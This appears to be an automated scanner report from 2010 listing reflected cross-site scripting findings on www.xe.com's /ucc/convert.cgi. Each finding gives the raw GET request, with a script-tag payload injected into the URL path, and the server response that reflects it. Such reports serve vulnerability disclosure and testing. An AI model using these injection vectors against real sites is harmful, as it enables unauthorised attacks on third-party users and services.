1. Cross-site scripting (reflected)
1.1. http://www.xe.com/ucc/convert.cgi [REST URL parameter 1]
1.2. http://www.xe.com/ucc/convert.cgi [REST URL parameter 2]
| Severity: | High | 
| Confidence: | Certain | 
| Host: | http://www.xe.com | 
| Path: | /ucc/convert.cgi | 
| GET /ucca78fd--><script>alert(1)< Host: www.xe.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close | 
| HTTP/1.1 404 Not Found Date: Thu, 30 Dec 2010 06:45:41 GMT Server: Apache Set-Cookie: ID=174.121.222.18 X-Powered-By: PHP/5.1.2 Vary: Accept-Encoding,User Connection: close Content-Type: text/html Content-Length: 17515 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <!- ...[SNIP]... <!--http://www.xe.com/ucca78fd--><script>alert(1)< ...[SNIP]... | 
| Severity: | High | 
| Confidence: | Certain | 
| Host: | http://www.xe.com | 
| Path: | /ucc/convert.cgi | 
| GET /ucc/convert.cgi50de6--><script>alert(1)< Host: www.xe.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close | 
| HTTP/1.1 404 Not Found Date: Thu, 30 Dec 2010 06:45:44 GMT Server: Apache Set-Cookie: ID=174.121.222.18 X-Powered-By: PHP/5.1.2 Vary: Accept-Encoding,User Connection: close Content-Type: text/html Content-Length: 17515 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <!- ...[SNIP]... <!--http://www.xe.com/ucc ...[SNIP]... |